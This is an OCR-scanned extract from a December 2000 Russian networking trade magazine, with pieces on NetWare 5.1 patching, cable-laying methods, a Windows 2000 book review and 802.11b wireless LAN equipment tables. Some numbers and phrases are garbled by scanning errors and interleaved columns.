10012858 Процедура проверки состояния NDS
2956812 Обновление NDS для NetWare 4.11, 4.2
10050997 OBT_OLD_RN и OBT.BACKLINK остаются в NetWare4
2923724 Предыдущее перемещение не завершено -637/фиктивные объе!
2956780 Обновленный IDEATA.HAM
10013126 Что такое фиктивные объекты, типы, флаги и этапы
прежде ОС нужно модернизировать.
Для начала надо скачать и установить
заплату NW51SP1. Она находится в
одноименном сжатом файле *.ехе,
размером примерно 250 Мбайт, и
имеет две версии — с 56- и 128-разряД-
ными ключами шифрования. Убеди-
тесь, что вы получили правильную
версию.
Затем Novell Licensing Service не-
обходимо обновить до версии 5.02. Хо-
тя это, вроде бы, прерогатива утилиты
Deployment Manager, я убедился, что
на практике это не совсем так. Поэтому
вам придется скачать, а также развер-
нуть файл nlslsp5a.exe и запустить
setupnls.exe. Это приложение на Java
подобно Deployment Manager, и выпол-
няется оно па вашей рабочей станции.
После выбора дерева все необходимое
программное обеспечение будет загру-
жено на все серверы в данном дереве.
Все, что остается, — только перезагру-
зить их.
И, наконец, последнее. Novell реко-
мендует скачать и установить заплату
ideata5.exe, чтобы избежать проблем,
связанных с синхронизацией сетевого
времени.
Что можно сказать в заключение?
За те полгода, ч то NetWare 5.1 работа-
ет в нашей организации, она неплохо
себя зарекомендовала. У нас возника-
ли проблемы с незавершенными
транзакциями NDS, но их удалось ре-
шить теми средствами и методами, о
которых вы только что прочитали, и
это никак не повлияло на работу
пользователей. По крайней мере, я
очень обрадовался, когда файл-сер-
верные приложения, по нескольку
раз в день зависавшие на Windows
NT 4 Server, наконец-то заработали
стабильно на NetWare 5.1. Остается
пожалеть лишь о том, что она не ис-
пользует для своей работы второй
процессор.
И еще, если в вашей организации
используются продукты третьих фирм,
пожалуйста, проверьте их на совмес-
тимость. Например, ARCserve 6.61
for Windows NT перестает коррект-
но распознавать объект «Лицен-
зия». LAN
Дмитрий Русаков имеет звания CNE и
MCSE. С ним можно связаться по ад-
ресу: dru@svsocbnk.mplik.ru.
24 LAN/Журнал сетевых решений
> ИНСТРУМЕНТАРИИ
Укладка кабеля
Игорь Иванцов
Укладка кабеля — одна из самых распространенных и в то
же время самых трудоемких операций. Кроме того, дело
это весьма ответственное — от качества укладки зависит
многое. И, как следствие, технологии укладки кабеля и инст-
рументария для них разработаны самым тщательным обра-
зом. Претендующие па оригинальность способы укладки
весьма многочисленны. Поэтому некоторые из них неизбеж-
но останутся за пределами данного материала.
Огромное разнообразие используемых способов объяс-
няется просто — кабель приходится укладывать самый раз-
ный и во всевозможных ситуациях. Одни методы годятся
только для зданий, другие предназначены для работ на ули-
це, третьи универсальны. Но почти все они имеют один об-
щий недостаток.
Ввиду высокой зарплаты специалистов повышение про-
изводительности труда является за рубежом одним из основ-
ных критериев оценки создаваемых технологий. К сожале-
нию, это приводит к тому, что стоимость инструментов для
реализации выбранного способа оказывается пропорцио-
нальна обеспечиваемой ими производительности труда. По-
чему к сожалению? Да потому, что стоимость этих инстру-
ментов (и так весьма существенная вследствие невысокой
серийности их производства) выливается поистине в фанта-
стические суммы, большинству отечественных инсталлято-
ров совершенно недоступные. Те, кому приходится выпол-
нять большие объемы работ, находятся в более выгодном по-
ложении, но даже их возможности ограничены. В результате
целый ряд технологий укладки кабеля остается не востребо-
ван на российском рынке, так как их нельзя реализовать без
специального инструментария.
Так или иначе, но ситуация все время меняется, и профес-
сионал должен ориентироваться в имеющихся возможно-
стях — вдруг что-нибудь да пригодится. Если вы системный
интегратор, администратор локальной сети, инженер отдела
АСУ одного из предприятий или отдела развития какого-ли-
бо оператора связи, то вам наверняка придется заниматься
укладкой кабеля в здании, а возможно, и на улице. Объясня-
ется это ростом использования технологий широкополосно-
го абонентского доступа на основе оп тики, а также необходи-
мостью модернизации и развития абонентских сетей на ос-
нове витой пары. Поэтому мы по возможности постараемся
рассмотреть все используемые сегодня для укладки кабеля
технологии, даже самые экзотические. С них и начнем.
Но вначале небольшое отступление. Рассматриваемые
ниже способы укладки кабеля можно условно разделить на
две группы. Первая группа - использующиеся только для
укладки кабеля, вторая — для укладки кабеля или гибких ка-
бельных каналов (английское название innerduct - «внут-
ренние» каналы). В последнее время гибкие кабельные кана-
лы получили почти повсеместное распространение. Они, на-
пример, становятся практически незаменимы при укладке
кабелей. За рубежом их повсеместно применяют для повы-
шения эффективности и безопасности кабельных работ в ма-
гистральной кабельной канализации — сначала в нее втяги-
ваются гибкие кабельные каналы, а уже потом в них помеща-
ются кабели. Такой способ позволяет не только защитить
уложенные кабели, но и обеспечивает возможность их извле-
чения из канала (обычно лежащие в пучке кабели переплета-
ются и слипаются так, что извлечь один из них совершенно
невозможно - в результате «мертвые» кабели продолжают
занимать место в каналах). Кабельные каналы — это не про-
сто прочные пластиковые трубки, они могут иметь специаль-
ный профиль и покрытие внутренней поверхности для сни-
жения трения кабеля, а также предустановленный шнур для
его втягивания. Естественно, для упрощения укладки кабеля
в каналы используются специальные технологии.
Наиболее экзотическая
из них — роботизирован-
ная укладка кабеля между
зданиями внутри бетон-
ных или керамических го-
родских канализационных
коллекторов. Эта техноло-
гия предусматривает два
варианта, отличающихся способом крепления кабеля (с по-
мощью металлических распорок или полимерного клея). В
обоих используется комплекс на основе робота-проходчика с
дистанционным управлением. Робот имеет набор сменных
инструментов для выполнения любых работ. Первоначально
его применяли для ремонта ка-
нализационных труб, а потом
приспособили еще и для ук-
ладки кабеля. Раз уж грубы
подходят к каждому зданию,
почему бы их не использовать
в качестве кабельной канали-
зации? Такая технология наи-
более подходит для укладки
волоконно-оптических линий,
как магистральных, так и отводов в здания. Несмотря на то
что рассматриваемая технология обходится весьма недеше-
во, она широко распространена в Европе и для нее созданы
все необходимые элементы (муфты, вводы, распределитель-
ные коробки и т. п.) с соответствующими характеристиками.
Главное достоинство роботизированной укладки кабеля —
огромная экономия за счет отказа от строительства кабель-
ной канализации.
Следующая в этом ряду — группа технологий укладки ка-
беля или гибких кабельных каналов в открытый грунт с по-
мощью кабелеукладчиков. Их возможности (производитель-
ность, глубина укладки и т. и.) и принцип действия могут
быть самыми разными. Тут и рытье узкой траншеи, и бес-
траншейная укладка с помощью плуга-ножа. Первый способ
комментариев не требует. Второй заключается в том, что зе-
мля как бы раздвигается специальным устройством, которое
одновременно обеспечивает укладку кабеля и капала па за-
26 LAN/Журнал сетевых решений
> ИНСТРУМЕНТАРИИ
данную глубину. В случаях,
когда кабель требуется про-
ложить иод непреодолимым
препятствием (дорожным
покрытием, зданием пли
просто обустроенной терри-
торией, которую желатель-
но уберечь от поврежде-
ний), применяется направ-
ленное горизонтальное бу-
подачи воздуха. Во втором слу-
чае поршни используются похо-
жие, но герметизирующее уст-
ройство намного сложнее и до-
роже, так как дополнительно
обеспечивает механическую по-
дачу (электрический или гидра-
влический привод) втягиваемо-
го кабеля. Оно имеет существен-
рение. Поскольку вести любые земляные работы в городе
весьма проблематично, пользоваться таким оборудованием
могут только специализированные строительно-монтажные
организации.
Теперь мы остановимся на группе технологий, пока еще
кажущихся своего рода экзотикой, ио получающих тем не
менее все большее распространение. Речь идет о способах,
предусматривающих использование пневматики. Они поз-
воляют в считанные минуты втянуть шнур (заготовить ка-
нал для укладки кабеля) или, в некоторых случаях, непо-
средственно кабель. Отдельно следует упомянуть вдувание
потоком воздуха высокого и низкого давления, вакуумное
втягивание и заготовку канала с помощью реактивной тяги.
Оборудование для заготовки канала или укладки кабеля
путем вдувания потоком воздуха сегодня выпускают почти
все компании, специализирующиеся на телекоммуникацион-
ном инструментарии. Принцип действия такого оборудова-
ния прост — движение поршня но каналу под действием избы-
точного давления воздуха, подаваемого с одной стороны кана-
ла. Способ получил распространение не только из-за неоспо-
римой простоты использования. Огромную роль сыграла его
высокая производительность (около ioo м канала за мин) при
не достижимой для других технологий равномерности подачи
и отсутствии рывков в случае прихвата кабеля. Однако пена
подобного оборудования такова, что пользоваться им могут
только высококвалифицированные профессионалы.
Высокое давление при-
меняется для заготовки ка-
налов (втягивания прочного
полимерного шнура или ме-
таллического троса для пос-
ледующей укладки на длину до 500 м при давлении 4,5 бар и
расходе воздуха до 3 м’/мин) из металлических, бетонных и
асбестоцементных труб (диаметром от 50 до 200 мм), а также
для непосредственной укладки кабеля в гибкие полимерные
каналы малого диаметра (от 20 до 150 мм). Этим способом
пользуются и для укладки кабеля в упомянутые выше «вну-
тренние» каналы. В первом случае высокое давление позво-
ляет проходить большое расстояние с одновременной очист-
кой канала поршнем от небольших загрязнений и воды. Не-
обходимое для этого оборудование устроено достаточно про-
сто — поршень (металлический цилиндрический с резиновы-
ми уплотнителями или пластико-
вый конический свободной посад-
ки, резиновый, поролоновый, на-
дувной тканевый и др.) и тяжелое
герметизирующее устройство для
установки в горловину канала и
А вот следующий способ
вполне доступен и малобюд-
жетным организациям. Низкое
давление и вакуум применяют-
ся в зданиях при заготовке ка-
налов (длиной до боо м при
расходе воздуха до ю м’/мин и
давлении до 0.2 бар) из метал-
лических или полимерных труб (диаметра от ю до 150 мм).
Они могут обеспечить только вдувание шнура или легкого
полимерного троса для последующей укладки кабеля. В та-
ких системах используются лишь облегченные поршни (по-
но большие габариты, поэтому
для подключения к нему гибкие
каналы должны быть уложены с
запасом по длине (несколько мет-
ров) со стороны вдувания. Дан-
ный метод налагает также ограни-
чения на диаметр канала (от 25 до
70 мм) и кабеля (от 8 до 35 мм), а
также, что важнее всего, их соот-
ношение. Благодаря механиче-
ской подаче давление воздуха мо-
жет меняться в достаточно широ-
ких пределах (7-10 бар при рас-
ходе воздуха у-и м’/мин).
ролоновые, пластиковые или
резиновые), а герметизирую-
щее устройство имеет упро-
щенную конс трукцию (обычно
это резиновый конус, устанав-
ливаемый вручную без крепле-
ния в распор). Судя по харак-
теристикам таких систем, их
вполне можно заменить пылесосом (однако это должен быть
промышленный пылесос, чтобы он мог не только всасывать,
но и подавать воздух) и комплектом самодельных уплотни-
телей и поршней, конструкция которых вполне ясна из при-
води мой иллюсграции.
Пожалуй, на этом обзор экзотики можно закончить.
Впрочем, кто знает, возможно, уже завтра технологии, пора-
жающие сейчас наше воображение, будут выглядеть вполне
обыденно. LAN
Игорь Иванцов - менеджер отдела «Инструменты и прибо-
ры для монтажа и обслуживания телекоммуникационных си-
стем» компании «СвязьКомплект». С ним можно связаться
по тел.: ('095)362-7787. по адресам: info@skomplekt.com,
http://Tenenef.skomplekt.com.
> http://www.lanmag.ru
Декабрь 2000 27
> НАСТОЛЬНАЯ КНИГА
Зубанов Ф.В.,
«Microsoft Windows 2000.
Планирование,
развертывание, управление».
Windows 2000
для профессионалов
Константин Пьянзин
Операционная система Windows
2000 находит все более широкое
применение в информационных
системах. Однако серьезной литерату-
ры по данной ОС относительно немно-
го, причем она в основном написана на
английском языке. Эго обстоятельство
представляе т серьезное неудобс тво для
многих организаций п работающих в
них системных администраторов, так
как англоязычная литература стоит до-
статочно дорого, купить
ее можно только в круп-
ных городах, да и анг-
лийским хорошо владе-
ют далеко не все.
Поэтому у пользова-
телей п администраторов
книги по Windows 2000
на русском языке вызы-
вают повышенный инте-
рес, Если не принимать
во внимание многочис-
ленных изданий для так
I ia-зы ваемых « чай н и ков»,
где в основном рассмат-
риваются процедуры ус-
тановки операционной
системы или начальной
ее настройки, выбор литературы про-
фессионального уровня на русском
языке более чем ограничен.
По мнению многих специалистов,
лучшим русскоязычным автором, пи-
шущим о Windows NT, является Федор
Зубанов, который длительное время ра-
ботает в московском представительстве
компании .Microsoft. До сих нор при-
надлежащая его перу книга «Windows
NT - выбор профи» служит эталоном
описания операционной системы.
Неудивительно, что появление книги
Зубанова, посвященной Windows 2000,
не могло не вызвать повышенного инте-
реса. Однако, на мой взгляд, это изда-
ние, хотя и очень неплохое, тем нс менее
проигрывает своим предшественникам.
11 тому есть несколько причин. Самым
главным недостатком книги является
ее ориентация на русские версии
Windows 2000. Правда, этот педоста-
гок следует поставить в вину не только
автору, но и попеня ть на качество пере-
вода и реализации локализованных ва-
риантов Windows 2ООО.
Ф. Зубанов пишет для профессиона-
лов и, в основном, рассматривает сер-
верные версии Windows 2000. Однако,
как известно, локализованных
Windows 2000 Advanced Server и
Windows 2000 Datacenter Server не су-
ществует в природе. Кроме того, цро-
фесс ио нал ы пред поч 11 -
тают не ставить русскую
версию Windows 2000
из-за ряда специфиче-
ских проблем (особенно
когда в сети одновре-
менно работают русские
и английские серверы
Windows 2000). Более
того, учебные курсы
Microsoft ориентирова-
ны исключительно на
английские версии
Windows. У каза i1 и ы й
выше недостаток был
бы не столь актуальным,
если бы автор сопрово-
ждал приводимые им
русифипированные варианты терми-
нов английскими оригиналами, как он
это делал в книгах по Window’s NT.
Второй крупный недостаток на-
личие многочисленных ошибок, при-
том возникших как по вине автора, так
и из-за халатности издательства. Коли-
чество ошибок и заблуждений поисти-
не превышает все допустимые пределы.
Достаточно привести такие яркие при-
меры, как: «Любой объект в каталоге
может быть контейнером» или «Рабо-
чая станция - тоже своего рода домен».
А чего стоит утверждение, что схемы
(schema) конкурирующих служб ката-
логов хранятся в текстовых файлах!
Нельзя также не упомянуть о неко-
торой поверхностности при описании
устройства и принципов работы служб
Windows 2ооо. Однако этот недостаток
присущ абсолютно всем книгам, где
рассматриваются общие принципы ра-
боты Windows 2000. Причина тому —
широкие возможности и большое ко-
личество сервисов ОС. 'Гем не менее
автор мог бы начать описание не с са-
мых сложных и нетривиальных служб.
И все же, несмотря па высказанные
здесь критические замечания, книга
получилась очень неплохая. Во всяком
случае она резко выделяется в лучшую
сторону среди подобных изданий. На
шестистах страницах читатель найдет
огромное количество сведений, пусть
и в кратком изложении. В книге затро-
нуты все более или менее актуальные
темы, в том числе служба каталогов
Active Directory, система безопасно-
сти, хранение и доступ к данным, упра-
вление системой, системные службы,
планирование и установка и многое,
многое другое.
Несмотря на наличие некоторых
ошибок, чувствуется, что книга при-
надлежит перу высококвалифициро-
ванного специалиста, хорошо владею-
щего предметом; отдельно следует от-
метить доступность изложения мате-
риала. Еще одна положительная черта
данного издания автор сумел избе-
жать очень распространенной ошиб-
ки, — он не акцептирует внимание на
малоинтересных для профессионалов
деталях, как-то: когда и на какие
кнопки нажимать или как инсталли-
ровать продукт.
Книга рекомендуется систем-
ным и сетевым администраторам
Windows 2000, а также тем, кто за-
нимается разработкой программ для
этой ОС. Кроме того, книга может
служить справочным руководством
или «отправной точкой» для начи-
нающих изучать Windows 2000. LAN
Книгу (Зубанов Ф.В.. «Microsoft
Windows 2000. Планирование, развер-
тывание. управление» - М.: Издатель-
ско-торговый дом «Русская Редакция»,
2ооо. — боо с.; ил. + CD) можно приоб-
рести в специализированных книжных
магазинах компьютерной литературы.
Ориентировочная цена 260 рублей.
28 LAN/Журнал сетевых решений
А кабели где?
остаточно быстрая. Достаточно де-
шевая. Достаточно совместимая.
- ,Эти три «достаточно» превратили
в свое время технологию Ethernet; (несо-
вершенную, как и все остальные) во все
покоряющую силу в «проводном» мире.
Сегодня, наконец, расположение
планет благоприятствует и беспровод-
ным локальным сетям стандарта 802.11b.
работающим на частоте 2,4 ГГц. Они от-
нюдь не рассматриваются в качестве .за-
мены проводных локальных сетей, ио
привлекают к себе внимание все более и
более широкого круга потребителей.
Более 75% читателей, принявших
участие в опросе, который Network
Magazine проводил в Internet в октяб-
ре, заявили, что уже используют бес-
проводные локальные сети. Нетипич-
ная выборка? Вполне возможно, по-
скольку некоторые из респондентов от-
кровенно признались в том, что они яв-
ляются производителями или консуль-
тантами, работающими в этой области.
Тем не менее их реакция отражает сло-
жившиеся на рынке тенденции.
Всего год назад удачей считалось
добиться пропускной способности в
2 Мбит/с между адаптером беспро-
водной сети и точкой доступа (Access
Point, АР - приемопередатчиком,
который связывает радиоклиентов с
существующей проводной инфра-
структурой), а сейчас можно встре-
тить пропускную способность в 5 или
даже 6 Мбит/с.
Год назад за клиентский радиоадап-
тер на базе PC Card приходилось пла-
тить около 500 долларов, а за АР — не
менее 2000 долларов. Сейчас цены сни-
зились до юо долларов за радиоадап-
тер и до 300 долларов — за АР, причем
с тем же. если не более высоким, уров-
нем п ро из водителю гости.
Но что лучше всего — так это реше-
ние проблемы совместимости. Еще не-
© Miller Freeman Inc.
Джонатан Эйнджел
давно для полной уверенности в том,
что клиентский радиоадаптер и АР бу-
дут нормально взаимодействовать друг
с другом, их необходимо было покупать
у одного и того же производителя. Сей-
час на рынке беспроводных локальных
сетей работает более 20 производителей,
и все выпускаемые ими радиоадаптеры
могут взаимодействовать с АР, предла-
гаемыми любой из этих компаний.
Все эти успехи были достигнуты
благодаря стандарту 802.11b и усили-
ям альянса Wireless Ethernet
Compatibility Alliance (WECA).
Программа тестирования и присвое-
ния торговой марки, проводимая
WECA, оказала неоценимую помощь
покупателям, хотя большая часть обо-
рудования. еще не имеющая знак
WiFi, также является совместимой.
СТИМУЛ ДЛЯ РАЗВИТИЯ
Совместимость дала возможность ис-
пользовать такое оборудование бес-
проводных локальных сетей, о котором
ранее и речи быть не могло. Например,
если вы приобрели для своего мобиль-
ного компьютера радиоадаптер в стан-
дарте 802.11b, то ноутбук можно брать с
собой в путешествия и получить широ-
кополосное соединение с Internet в лю-
бом отеле, аэропорте, библиотеке или
киберкафе, где имеется точка доступа
(см. врезку «Это птичка. Это самолет.
А это SuperLAN»).
Первой областью применения бес-
проводных сетей стали склады, служа-
щим которых приходится перемещать-
ся по территории во время обмена дан-
ными с сервером. 11 до сих пор откры-
тое пространство остается «естествен-
ной средой обитания» беспроводных
сетей, поскольку в таких условиях дос-
тигается наилучшая производитель-
ность, и пользователи сохраняют сво-
боду передни жен ия.
В Северной Каролине по сенаторов
и членов палаты представителей имеют
мобильные компьютеры, оснащенные
средствами беспроводной связи, что
позволяет им получать сообщения
электронной почты, использовать ин-
формацию из своих календарей и рас-
сматривать законопроекты. По мнению
Тома Тейлора, главного разработчика
сетевых систем Генеральной ассамблеи
шт. Северная Каролина, сеть из 20 АР
компании Lucent Technologies (все они
находятся в одной подсети) позволяет
законодателям свободно передвигать-
ся, не теряя контакта.
Однако чтобы получить доступ к
сети, вовсе не обязательно баллотиро-
ваться в сенат: другой важной сферой
применения беспроводных сетей ста-
новятся конференц-центры. В тече-
ние вот уже некоторого времени ком-
пания Novell создает в месте проведе-
ния конференций точки беспровод-
ной связи как для служащих, так и
для участников конференций. Есть и
более масштабные примеры. Недавно
компания Apple развернула 18 АР на
Всемирной конференции разработчи-
ков 2000 (2000 Worldwide Developers
Conference, WWDC) в г. Сап-Хосе.
Беспроводной доступ в Internet пре-
доставлялся и в главном зале, и в вы-
ела вочном павильоне.
Еще одна область применения —
обеспечение беспроводных соедине-
ний в самом офисе. Например, конфе-
ренц-залы предприятий могут быть
оборудованы таким образом, чтобы
участники совещаний могли принести
с собой мобильные компьютеры и. в
случае необходимости, воспользовать-
ся ресурсами Internet или просмотреть
сообщения электронной почты. Бес-
проводные локальные сети разверты-
ваются также в тех офисах, где рабочие
столы находятся в коллективном поль-
зовании большого числа мобильных
сотрудников и выделяются каждому
из них по потребносги. (В этом случае,
однако, не очень понятно, почему так
30 LAN/Журнал сетевых решений
> ТЕМА НОМЕРА: БЕСПРОВОДНЫЕ СЕТИ 802.11В
важны беспроводные сети. Ведь если сотрудники компании
не могут подключить кабель к компьютеру, когда приходят
утром в офис, скорее всего, вам вообще вряд ли захочется,
чтобы они пользовались ноутбуками!)
Как считают многие участники опроса, беспроводные ло-
кальные сети также очень уместны — и как локальное реше-
ние, и как система, охватывающая всю территорию, — в тех
случаях, когда практически невозможно проложить кабель-
ные соединения. (Например, когда приходится работать в
монолитном здании, в помещении с асбестовыми стенами
или в доме, имеющем историческое значение и не подлежа-
щем реконструкции.)
В Кремниевой долине некоторые Internet-компании ис-
пользуют беспроводную связь из-за того, что цены на недви-
жимость очень высоки, а заключить долговременный договор
об аренде крайне сложно. При использовании беспроводной
связи в новом офисе можно обой тись без затрат на прокладку
кабелей, а в случае переезда в другое место не придется оста-
влять новым хозяевам какое-либо оборудование.
Идея беспроводной связи была доведена до логического
завершения в колледже Greenville College в Гринвилле,
где 8о2.пЬ-совместимыми точками доступа был оснащен
весь кампус площадью 24 акра. Как объяснил сетевой ад-
министратор Пол Юнкер, первопричиной этого стало же-
лание избежать затрат на оснащение сетевыми соединени-
ями аудиторий, общежитий и библиотек. А теперь сеть из
6о АР позволяет студентам получать сообщения электрон-
ной почты и путешествовать в Internet, даже находясь вне
зданий колледжа, если на улице стоит хорошая погода. В
некоторых стратегически важных местах кампуса, как от-
метил Юнкер, были установлены внешние антенны с це-
лью обеспечить хорошее качество такого рода соединений.
Собственно говоря, соединение по IP легко устанавливает-
ся и без дополнительных антенн за пределами большинст-
ва зданий кампуса, поскольку радиоволны свободно про-
никают через окна и стены.
КАКОВЫ ПЕРСПЕКТИВЫ?
Как ни удивительно, но некоторые авиалинии, такие, как
Condor — подразделение чартерных рейсов корпорации
Lufthansa, устанавливают на своих самолетах клиентские
адаптеры стандарта 802.11b. Хотя эти системы и не предна-
значены для использования во время полета, с их помощью
мобильные компьютеры в кабине пилота могут установить
связь с наземными информационными системами сразу, как
только самолет пристыкуется к «рукаву», соединяющему
его со зданием аэропорта.
Беспроводные локальные сети того или иного вида хоро-
шо подходят для дома. Провайдеры услуг могут встраивать
устройства беспроводной связи в кабельный модем или мар-
шрутизатор цифровой абонентской линии (Digital
Subscriber Line, DSL), тем самым давая потребителям воз-
можность обойтись без просверливания новых дырок в сте-
нах дома. (Сторонники оборудования HomeRF со скачкооб-
разной сменой частот до сих пор ведут арьергардные бои за
этот рынок. Но 802.11b — это предпочтительный стандарт
для любых радиоадаптеров, если их планируется также ис-
пользовать и в корпоративной среде.)
> http://www.lanmag.ru
Декабрь 2000 31
> ТЕМА НОМЕРА:
Клиентские адаптеры (PC CARD, ЕСЛИ НЕ УКАЗАНО ИНОЕ)
Продукт Отличительные особенности
ЗСош AirConnect PC Card Создан на базе аппаратного обеспечения компании Symbol со сьемной антенной. ЗСот добавила защиту Mobile IP и Microsoft Point to Point Encryption (MPPE).
Apple AirPort Разработанный Lucent клиентский адаптер стандарта 802.11b для выпущенных недавно компанией Apple мобильных и настольных компьютеров. Если у вас есть совместимый компьютер. то подобное дополнение обойдется всего в 99 долларов.
Breezecom PC-DS.ll A Встроенная антенна и разьем для внешней антенны. Поддержка драйверов Windows и Linux; адаптер шины IS предлагается отдельно.
Breezecom SA-DS.ll Устройство только с источником постоянного тока и четырьмя портами lOBaseT. Позволяет подключать к беспроводной сети группу проводных устройств.
Серия AIR-PCM340 компании Cisco Systems Выпускается с 40- и 128-разрядным WEP. Эффективнее на 15%, чем другие карты, когда используется с Cisco АР. Довольно ограниченный выбор драйверов.
Compaq Computer WL100 WLAN PC Card Питание от напряжения 3.3 В на базе решения Intersil; драйверы Windows и Windows СЕ.
D-Lmk DWL-650 Поддержка 40-разрядного Wired Equivalent Privacy (WEP)
Enterasys High Rate PC Card 128-разрядный WEP в качестве дополнительной возможности.
Farallon SkyLine Wireless PC Card Одна из немногих карт, поддерживающая как клиентов Macintosh, так и Windows.
Intel PRO/Wireless LAN PC Card Утилита Му WLAN Places упрощает соединения с различными Access Point (АР). Поддержка Mobile IP. Драйверы для всех версий Windows, Palm и Linux.
Lucent Technologies Orinoco PC Card Выпускается в версиях Silver (64-разрядная) и Gold (128-разрядная). Поддержка широкого диапазона драйверов: Windows 95/98/NT/2000 и СЕ, Linux и MacOS.
Карта No Wires Needed WLAN В дополнение к WEP имеет собственную защиту AirLock. Уровень энергопотребления ниже среднего, великолепная скорость шифрования.
Карта Nokia 0110/111 WLAN 40- или 128-разрядный WEP. разьем для внешней антенны (С111). Может применяться совместно со смарт-картой компании Nokia, которая используется для хранения профилей и ключей WEP.
Карта OverLAN PCMCIA Версия Silver (64-разрядное шифрование) или Gold (128-разрядное). Предлагаются адаптеры ISA и PCI для хоста.
Proxim RangeLAN-DS PC Card 40- и 128-разрядный WEP. Драйверы только для Windows. Инструментарий обзора узла плюс пиктограмма на рабочем столе, которая постоянно показывает качество соединения.
Samsung MagicLAN SWL-2000N 40-разрядный WEP. Драйверы для Linux и для всех версий Windows.
Symbol LA41X1 PC Card Имеет поддержку 128-разрядного WEP, Mobile IP, утилиту Му WLAN Places. Как и другие производители, компания Symbol предлагает адаптеры PCI для настольных ПК.
Xircom Wireless Ethernet Adapter 40- или 128-разрядный WEP; создан для Xircom компанией Cisco.
Zcomax XL300 Wireless PC Card Выпускается со съемной и встроенной антенной. Драйверы для всех версий Windows. Linux и FreeBSD.
Таблица 1. Эти клиентские радиоадаптеры должны устанавливать соединение с Access Point (АР) любых производителей.
Благодаря всем этим факторам ры-
нок быстро растет. Специалисты одной
из компаний, занимающихся исследо-
ванием рынка, - The Phillips Group —
считают, что оборот рынка беспровод-
ных сетей в 2004 г. превысит сумму в 1,7
млрд долларов притом, что в 1999 г.
аналогичный показатель составлял 300
млн долларов. The Cahners In-Stat
Group в своих оценках даже более оп-
тимистична, прогнозируя, что оборот
этого рынка к 2003 г. достигнет 2,2 млрд
долларов.
Больше года назад Apple начала вы-
пуск мобильных компьютеров со встро-
енными сетевыми средствами стандар-
та 802.11b. Сейчас производители ком-
пьютеров на базе процессоров Intel, пы-
тавшиеся сначала копировать лишь
прозрачный плас тик Apple, в конце кон-
цов, делают то же самое. В октябре 2000
г. компания IBM выпустила модели
ThinkPad со встроенным радиоадапте-
ром, а вскоре ее примеру должны после-
довать и другие производители.
Большинство новых мобильных
компьютеров с целью расширения зоны
32 LAN/Журнал сетевых решений
> ТЕМА НОМЕРА:
действия будет оснаща ться антеннами,
устанавливаемыми с обеих сторон дис-
плея, кроме того, в них будут встроены
мини-разъемы стандарта PCI для уста-
новки радиоплат. По словам Криса
Хеннннгсена, вице-президента по мар-
кетингу компании Intersil, снижение
стоимости компонентов позволит про-
изводителям предложить сетевые сред-
ства в стандарте 802.11b всего за допол-
нительные 99 долларов и по-прежнему
сохранить рентабельность своих сис-
тем. К концу 2001 г., как считает Хен-
нингсен, 802.11b и Bluetooth, скорее все-
го, будут интегрированы в наборы мик-
росхем для системных плат.
ПОЧТИ ТОВАР МАССОВОГО СПРОСА
Оборудование для беспроводных ло-
кальных сетей пока еще не стало това-
ром массового спроса, подобно сете-
вым адаптерам и концентраторам для
проводных соединений, но уже вплот-
ную приблизилось к этому статусу.
Сейчас выпускается так много обору-
дования в стандарте 802.11b, что детально
обсудить все продукты в рамках одной
статьи вряд ли возможно. Краткое опи-
сание большинства из них приведено в
Таблицах 1 4. Оставшуюся часть статьи
мне хотелось бы посвятить обсуждению
некоторых моментов, которые следует
учитывать при покупке таких систем.
Базовая беспроводная сеть состоит
из двух компонентов. Во-первых, это
клиентский радиоадаптер, обычно по-
ставляемый в виде карт стандарта PC
Card со встроенной антенной. Эти уст-
ройства в первую очередь предназна-
чены для мобильных компьютеров, но
они также могут устанавливаться и на
настольных системах с помощью хост-
адаптеров ISA или PCI.
Клиентский радиоадаптер стоит от
99 долларов (за каргу Apple, которая
поддерживается электроникой, уже ис-
пользуемой в мобильных компьютерах
этой компании) до 249 долларов и вы-
ше. Выбор производи теля чаще всего не
играет роли, гак как большинство моде-
лей клиентских адаптеров создается на
основе наборов микросхем Lucent или
Intersil либо приобретается у этих ком-
паний целиком по ОЕМ-соглашеииям.
Однако с программными драйвера-
ми дело обстоит совсем по-другому.
Все радиоадаптеры снабжаются драй-
верами для Windows 95/98, NT и 2000,
а вот Windows СЕ и Palm поддержива-
ются далеко не всегда. И лишь у очень
немногих адаптеров есть драйверы для
Linux, FreeBSD или MacOS. Некото-
рые драйверы имеют первоклассные
средс тва для контроля за качеством со-
единений при перемещении пользова-
теля. Кроме того (об этом еще будет
сказано далее), в зависимос ти от выбо-
ра драйвера адаптеры могут потреб-
лять разное количество энергии.
Второй компонент сети — это точка
доступа АР, которая имеет порт
Ethernet и приемопередатчик. АР дей-
ствует как мост между проводными и
беспроводными сетями. Как правило,
этот компонент реализует функции
трансляции сетевых адресов (Network
Address Translation, NAT), динамиче-
ского назначения адресов (Dynamic
Беспроводный Оптический Канал Связи
Ethernet, Fast Ethernet, Е1 на расстояние от 250м до 2.5 км
> http://www.lanmag.ru
Декабрь 2000 33
> ТЕМА НОМЕРА:
Точки доступа (SOHO)
Продукт Отличительные особенности
Apple AirPort Включает модем V.90, Ethernet. NAT, DHCP. Появление этой точки доступа стоимостью всего в 300 долларов положило начало революции в области цен на рынке АР.
Compaq Software АР Оснащенные этим программным обеспечением и адаптером PCI WLAN, любые настольные ПК могут исполнять роль АР. Поддержка функций маршрутизации WinGate.
D-Link DWL-1000AP Порт Ethernet; модем предлагается дополнительно. Может действовать одновременно как сервер и клиент DHCP; предусмотрена совместимость с динамическим соединением.
Lucent RG-1000 Аналогичен Apple AirPort (который также выпускает компания Lucent), но имеет более консервативный дизайн и программное обеспечение, ориентированное на ПК.
Melco AirStation Базовая АР с портом Ethernet и функциями маршрутизации. Продается под торговыми марками Buffalo и TechWorks и стоит 279 долларов или 299 долларов со встроенным модемом.
Nokia MWL642 Эта АР, позиционируемая для провайдеров услуг, интегрируется с интерфейсом Symetric Digital Subscriber Line (SDSL).
Zoom Telephonies ZoomAir AP128 Имеет встроенный маршрутизатор ISDN. Поддерживаются и NAT, и DHCP. Среди возможностей межсетевого экрана поддержка СНАР/РАР RADIUS, фильтрация пакетов и обратная связь.
Программное обеспечение Zoom Telephonies AP Подобно программному предложению компании Compaq, оно позволяет превратить обычный ПК в АР.
Таблица 2. Эти точки доступа (Access Point, АР) подходят даже для домашних сетей.
Host Configuration Protocol, DHCP), а
также функции маршрутизации, часто
поддерживая несколько клиентов с по-
мощью одного статического IP-адреса.
Цена аппаратного обеспечения АР
варьируется в диапазоне от 280 до 2000
долларов. По мере продвижения вверх
по продуктовой линейке какого-либо
производителя вы получаете все более
быстрые или качественные интерфей-
